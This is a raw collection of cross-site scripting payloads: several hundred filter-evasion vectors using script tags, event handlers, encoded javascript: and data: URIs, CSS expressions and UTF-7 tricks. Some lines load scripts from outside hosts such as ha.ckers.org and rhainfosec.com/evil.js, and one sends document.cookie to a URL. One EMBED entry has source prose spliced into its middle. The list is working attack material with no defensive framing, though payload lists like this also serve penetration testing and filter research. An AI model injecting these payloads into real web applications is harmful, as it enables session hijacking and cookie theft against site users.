data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
</b><script>alert(7)</script>
background-image: url(javascript:alert(1))
[url=javascript:alert('XSS');]click me[/url]
[url=javascript:alert(1);]click me[/url]


oncontextmenu=prompt(document.cookie)
"><input>javascript:alert(document.cookie);>
"><% response.write "<script type=text/javascript>alert(document.cookie)</script>" %>
"><img src=1 onerror=alert(document.cookie);>
"><IMG SRC=JaVaScRiPt:alert(document.cookie)>
"><IMG """><SCRIPT>alert(document.cookie)</SCRIPT>">
"><IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
"><IMG SRC="jav	ascript:alert(document.cookie);">
"><IMG SRC="jav&#x09;ascript:alert(document.cookie);">
\";alert(document.cookie);//
"></TITLE><SCRIPT>alert(document.cookie);</SCRIPT>
"><%tag style="xss:expression(alert(document.cookie))" %>
"><script>alert(document.cookie)</script>
"><script>alert(document.cookie)</script>
"><script>alert(document.cookie)</script>
"><h1>
"><tetxarea></script><img src=1 onerror=alert(document.cookie);>
<script>window.navigate("http://localhost/calismalar/xss/index.php?cookie=+document.cookie")</script>
%uff1cscript%uff1ealert(document.cookie)%uff1c/script%uff1ealert


“/></a></><img src=1.gif onerror=alert(document.cookie)>
</script>">'><script>prompt(String.fromCharCode(88.83.83))</script>
"><option>"><button>img src=x onerror=alert(/xss/);></button></option>
</title><script>alert(/xss/)</script>
'"><script>alert(document.domain)</script>
"><iframe onclick=alert(Evan)></iframe>
</textarea>"><script>prompt(Evan)</script>
//>'>"><img src=x onerror=prompt(Evan);>
"><img src=x onerror=prompt(1)>.asd.asd
'"()&%1<ScRiPt >prompt(963191)</ScRiPt>	
'"--></style></script><script>alert(/xss/)</script>	
"><img src=x.png onerror=prompt("XSS");>	
"><img src=x onerror=prompt(1);>	
<img src=x onerror=alert(0)>
"><script>prompt(1)</script>
"/><script>alert(document.cookie);</script>
"><IMG SRC=# onmouseover="alert('xss')">
<svg onload="prompt(/xss by evan/);">	
#!prettyPhoto/<a onclick="alert(/XSS by Evan/);">/	
<IMG SRC="jalert('XSS');">
<IMG SRC=jalert('XSS')>
false,false,false);});alert(1); //	
</title><!-- --><body onload=alert(1);></iframe src=http://google.com>-->
'"onmouseover="prompt(1)"
"><script>alert(document.domain)</script>
<script>alert(1);</script>	
<script>prompt(1);</script>	
<script>confirm (/xss by evan/);</script>	
<script src="http://rhainfosec.com/evil.js">	
<scRiPt>alert(1);</scrIPt>	
<scr<script>ipt>alert(1)</scr<script>ipt>	
<a href="rhainfosec.com" onclimbatree=alert(1)>ClickHere</a>
<body/onhashchange=alert(1)><a href=#>clickit	
<img/src=aaa.jpg onerror=prompt(1);>
<video src=x onerror=prompt(1);>	
<audio src=x onerror=prompt(1);>
<iframesrc="javascript:alert(2)">	
<iframe/src="data:text&sol;html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<embed/src=//goo.gl/nlX0P>	
<form action="Javascript:alert(1)"><input type=submit>	
<isindex action="javascript:alert(1)" type=image>	
<isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image>
<isindex action=data:text/html, type=image>
<formaction='data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt'><button>CLICK	
<isindexformaction="javascript:alert(1)" type=image>	
<input type="image" formaction=JaVaScript:alert(0)>	
<form><button formaction=javascript&colon;alert(/xssbyevan/)>CLICKME	
<object/data=//goo.gl/nlX0P?	
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">	
<applet code="javascript:confirm(document.cookie);">	
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>	
<svg/onload=prompt(1);>	
<marquee/onstart=confirm(2)>/	
<body onload=prompt(1);>	
<select autofocus onfocus=alert(1)>	
<textarea autofocus onfocus=alert(1)>	
<keygen autofocus onfocus=alert(1)>
<video><source onerror="javascript:alert(1)">
<q/oncut=alert(1)>
<q/oncut=open()>
<marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)>	
<a onmouseover="javascript:window.onerror=alert;throw 1>
<img src=x onerror="javascript:window.onerror=alert;throw 1">	
<a onmouseover=location=’javascript:alert(1)>click	
<body onfocus="location='javascrpt:alert(1) >123	
<svg><script>alert&#40/1/&#41</script>	
<meta content="&NewLine; 1 &NewLine;;JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>	
<math><a xlink:href="//jsfiddle.net/t846h/">click
<svg><![CDATA[><imagexlink:href="]]><img/src=xx:xonerror=alert(2)//"></svg>
<svg xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName="xlink:href" values=";javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/>	
<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:\u0061lert(1);"></g></svg>
<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>	
<meta http-equiv="refresh" content="0;url=//goo.gl/nlX0P">	
" autofocusonfocus=alert(1)//	
" onmouseover="prompt(0) x="	
" onfocusin=alert(1) autofocus x="	
" onfocusout=alert(1) autofocus x="	
" onblur=alert(1) autofocus a="	
";alert(1)//	
"/></script><svg onload='-/"/-prompt(/xss by evan/)//'	
"><img src=x <img src=x onerror=prompt(7)>=<img src=x onerror=prompt(7)>(1)>	
<img src="<img src=search"/onerror=alert("xss")//">	
"><h1 ondblclick=prompt(document.domain)>xss by evan</h1>	
';prompt(String.fromCharCode(120,+115,+115))//\';
<iframe\uB\uC\uAsrc\uB\uC\uA=\uB\uC\uA "javascript:alert(1);">	
<><><><><><a onmouseover=prompt(1337)>XSS</a>	
<a href="java%1B(Jscript:alert(1)">test
');alert(document.cookie)//	
"></iframe><script>alert(document.cookie)</script>xss
'+prompt(9)+'	
<input type="hidden" name="asdhakjshdkjashdkjashd" value="\" onload=confirm(000) />" />
javascript:alert(1);
<iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00>
<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
<sVg><scRipt %00>alert&lpar;1&rpar; {Opera}
<img/src=`%00` onerror=this.onerror=confirm(1)
<form><isindex formaction="javascript&colon;confirm(1)"
<img src=`%00`&NewLine; onerror=alert(1)&NewLine;
<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
&#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00
<iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
<form><a href="javascript:\u0061lert&#x28;1&#x29;">X
</script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'>
<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a
http://www.google<script .com>alert(document.location)</script
<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a
<img/src=@&#32;&#13; onerror = prompt('&#49;')
<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;
<script ^__^>alert(String.fromCharCode(49))</script ^__^
</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(
&#00;</form><input type&#61;"date" onfocus="alert(1)">
<form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>
<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
<script ~~~>alert(0%0)</script ~~~>
<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>
<///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'
&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}
<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
<div/style="width:expression(confirm(1))">X</div> {IE7}
<iframe/%00/ src=javaSCRIPT&colon;alert(1)
//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>
<a/href="javascript:&#13; javascript:prompt(1)"><input type="X">
</plaintext\></|\><plaintext/onmouseover=prompt(1)
</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}
<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
<div onmouseover='alert&lpar;1&rpar;'>DIV</div>
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<var onmouseover="prompt(1)">On Mouse Over</var>
<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
<img src="/" =_=" title="onerror='prompt(1)'">
<%<!--'%><script>alert(1);</script -->
<script src="data:text/javascript,alert(1)"></script>
<iframe/src \/\/onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
<input value=<><iframe/src=javascript:confirm(1)
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
http://www.<script>alert(1)</script .com
<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>
<svg><script ?>alert(1)
<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
<img src=`xx:xx`onerror=alert(1)>
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
<math><a xlink:href="//jsfiddle.net/t846h/">click
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
<svg contentScriptType=text/vbs><script>MsgBox+1
<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script
ject data=javascript&colon;\u0061&#x6C;&#101%72t(1)><ob
<script>+-+-1-+-+alert(1)</script>
<body/onload=&lt;!--&gt;&#10alert(1)>
<script itworksinallbrowsers>/*<script* */alert(1)</script
<img src ?itworksonchrome?\/onerror = alert(1)
<svg><script>//&NewLine;confirm(1);</script </svg>
<svg><script onlypossibleinopera:-)> alert(1)
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
<script x> alert(1) </script 1=2
<div/onmouseover='alert(1)'> style="x:">
<--`<img/src=` onerror=alert(1)> --!>
<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
"><img src=x onerror=window.open('https://www.google.com/');>
<form><button formaction=javascript&colon;alert(1)>CLICKME
<math><a xlink:href="//jsfiddle.net/t846h/">click
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
“><script>alert(123);</script> 
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> 
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("uceka says, 'XSS'")`>
<a onmouseover="alert(document.cookie)">xxs link</a> 
<a onmouseover=alert(document.cookie)>xxs link</a> 
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
“><img src=bogus onError=alert(23)>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC= onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
\";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="livescript:[code]">
<BODY ONLOAD=alert('XSS')>
<BGSOUND SRC="javascript:alert('XSS');"> 
<BR SIZE="&{alert('XSS')}">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
exp/*<A STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> 
<XSS STYLE="xss:expression(alert('XSS'))">
<XSS STYLE="behavior: url(xss.htc);">
¼script¾alert(¢XSS¢)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> 
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> 
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<!--[if gte IE 4]>
 <SCRIPT>alert('XSS');</SCRIPT>
 <![endif]-->
<BASE HREF="javascript:alert('XSS');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
EMBED SRC="http://ha.ckers.Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info).:
org/xss.swf" AllowScriptAccess="always"></EMBED>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<XML SRC="xsstest.xml" ID=I></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>

<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
<? echo('<SCR)';
echo('IPT>alert("XSS")</SCRIPT>'); ?>
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="http://66.102.7.147/">XSS</A>
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
<A HREF="http://1113982867/">XSS</A>
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
<A HREF="h
tt	p://6	6.000146.0x7.147/">XSS</A>
<A HREF="//www.google.com/">XSS</A>
<A HREF="//google">XSS</A>
<A HREF="http://ha.ckers.org@google">XSS</A>
<A HREF="http://google:ha.ckers.org">XSS</A>
<A HREF="http://google.com/">XSS</A>
<A HREF="http://www.google.com./">XSS</A>
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>
<
%3C
&lt
&lt;
&LT
&LT;
&#60
&#060
&#0060
&#00060
&#000060
&#0000060
&#60;
&#060;
&#0060;
&#00060;
&#000060;
&#0000060;
&#x3c
&#x03c
&#x003c
&#x0003c
&#x00003c
&#x000003c
&#x3c;
&#x03c;
&#x003c;
&#x0003c;
&#x00003c;
&#x000003c;
&#X3c
&#X03c
&#X003c
&#X0003c
&#X00003c
&#X000003c
&#X3c;
&#X03c;
&#X003c;
&#X0003c;
&#X00003c;
&#X000003c;
&#x3C
&#x03C
&#x003C
&#x0003C
&#x00003C
&#x000003C
&#x3C;
&#x03C;
&#x003C;
&#x0003C;
&#x00003C;
&#x000003C;
&#X3C
&#X03C
&#X003C
&#X0003C
&#X00003C
&#X000003C
&#X3C;
&#X03C;
&#X003C;
&#X0003C;
&#X00003C;
&#X000003C;
\x3c
\x3C
\u003c
\u003C

<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
<SCRIPT>document.cookie=true;</SCRIPT>
<IMG SRC="jav ascript:document.cookie=true;">
<IMG SRC="javascript:document.cookie=true;">
<IMG SRC="  javascript:document.cookie=true;">
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
<SCRIPT>document.cookie=true;//<</SCRIPT>
<SCRIPT <B>document.cookie=true;</SCRIPT>
<IMG SRC="javascript:document.cookie=true;">
<iframe src="javascript:document.cookie=true;> 
<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT> 
</TITLE><SCRIPT>document.cookie=true;</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
<BODY BACKGROUND="javascript:document.cookie=true;">
<BODY ONLOAD=document.cookie=true;>
<IMG DYNSRC="javascript:document.cookie=true;">
<IMG LOWSRC="javascript:document.cookie=true;">
<BGSOUND SRC="javascript:document.cookie=true;">
<BR SIZE="&{document.cookie=true}">
<LAYER SRC="javascript:document.cookie=true;"></LAYER>
<LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting 
¼script¾document.cookie=true;¼/script¾ 
<IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
<TABLE BACKGROUND="javascript:document.cookie=true;">
<TABLE><TD BACKGROUND="javascript:document.cookie=true;">
<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
<DIV STYLE="background-image: url(
javascript:document.cookie=true;)">
<DIV STYLE="width: expression(document.cookie=true);">
<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
<IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)">
<CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)"> 
exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)'> 
<STYLE TYPE="text/javascript">document.cookie=true;</STYLE> 
<STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A> 
<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE> 
<SCRIPT>document.cookie=true;</SCRIPT>
<BASE HREF="javascript:document.cookie=true;//">
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>
<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
<a href="javascript#document.cookie=true;">
<div onmouseover="document.cookie=true;">
<img src="javascript:document.cookie=true;">
<img dynsrc="javascript:document.cookie=true;">
<input type="image" dynsrc="javascript:document.cookie=true;">
<bgsound src="javascript:document.cookie=true;">
&<script>document.cookie=true;</script> 
&{document.cookie=true;}; 
<img src=&{document.cookie=true;};> 
<link rel="stylesheet" href="javascript:document.cookie=true;"> 
<img src="mocha:document.cookie=true;"> 
<img src="livescript:document.cookie=true;"> 
<a href="about:<script>document.cookie=true;</script>"> 
<body onload="document.cookie=true;"> 
<div style="background-image: url(javascript:document.cookie=true;);"> 
<div style="behaviour: url([link to code]);"> 
<div style="binding: url([link to code]);"> 
<div style="width: expression(document.cookie=true;);">
<style type="text/javascript">document.cookie=true;</style>
<object classid="clsid:..." codebase="javascript:document.cookie=true;">
<style><!--</style><script>document.cookie=true;//--></script>
<<script>document.cookie=true;</script>
<script>document.cookie=true;//--></script>
<!-- -- --><script>document.cookie=true;</script><!-- -- -->
<img src="blah"onmouseover="document.cookie=true;">
<img src="blah>" onmouseover="document.cookie=true;">
<xml src="javascript:document.cookie=true;">
<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
